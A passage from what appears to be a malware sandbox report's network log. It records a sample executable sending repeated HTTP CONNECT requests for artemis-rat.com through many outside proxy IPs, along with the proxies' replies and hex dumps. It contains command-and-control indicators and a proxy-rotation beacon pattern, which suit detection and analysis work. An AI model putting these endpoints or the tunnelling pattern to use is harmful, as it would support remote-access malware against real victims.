                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.054122925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.397144079 CET295INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 150
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              901192.168.2.452327189.240.60.16490907284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.089745998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.342300892 CET72INHTTP/1.1 200 Connection established
                                              Proxy-Agent: Fortinet-Proxy/1.0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              902192.168.2.452924162.159.242.7807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.095618963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.261382103 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              903192.168.2.45272945.233.2.141537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.097103119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              904192.168.2.45176765.169.38.73265927284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.098639011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              905192.168.2.452870154.205.152.9631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.100457907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.314188004 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              906192.168.2.45275943.131.245.216156737284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.102519989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              907192.168.2.45278687.106.114.12460057284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.102920055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              908192.168.2.45279918.135.211.18231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.103467941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.394699097 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              909192.168.2.452730111.90.150.10910807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.103967905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              910192.168.2.45058438.45.44.1099997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.104597092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.163285017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              911192.168.2.45276543.155.165.196156737284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.107688904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              912192.168.2.45294374.48.7.43807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.111346006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              913192.168.2.45287738.162.1.23231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.111411095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.538399935 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              914192.168.2.452960104.20.56.71807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.117865086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.271838903 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              915192.168.2.45282451.15.242.20288887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.119360924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.866183996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              916192.168.2.452884162.120.71.11807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.119817019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.350699902 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              917192.168.2.452748113.125.82.1131287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.119818926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.866453886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.798178911 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              918192.168.2.452775177.12.118.160807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.123070955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.451047897 CET340INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.2
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              919192.168.2.45312393.190.24.1194437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.123938084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              920192.168.2.45280937.235.53.20867897284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.125374079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.449687958 CET339INHTTP/1.1 403 Forbidden
                                              Server: squid/4.7
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 5
                                              X-Squid-Error: TCP_RESET 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              X-Cache: MISS from proxy.wakoopa.com
                                              Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                              Connection: keep-alive
                                              Data Raw: 72 65 73 65 74
                                              Data Ascii: reset


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              921192.168.2.45312693.190.24.1194437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.125539064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              922192.168.2.45312793.190.24.1194437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.127077103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              923192.168.2.45312893.190.24.1194437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.129806042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              924192.168.2.452977104.17.66.69807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.133466005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.288381100 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              925192.168.2.45290838.162.14.17931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.135230064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.561825037 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              926192.168.2.45267043.231.22.228807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.135282040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.572962046 CET343INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 182
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              927192.168.2.452744103.19.59.10219837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.135332108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.511249065 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              928192.168.2.45315143.153.11.584437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.153260946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              929192.168.2.45315443.153.11.584437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.154304981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              930192.168.2.452963147.124.212.31304797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.154997110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.756963015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.367954016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.554246902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
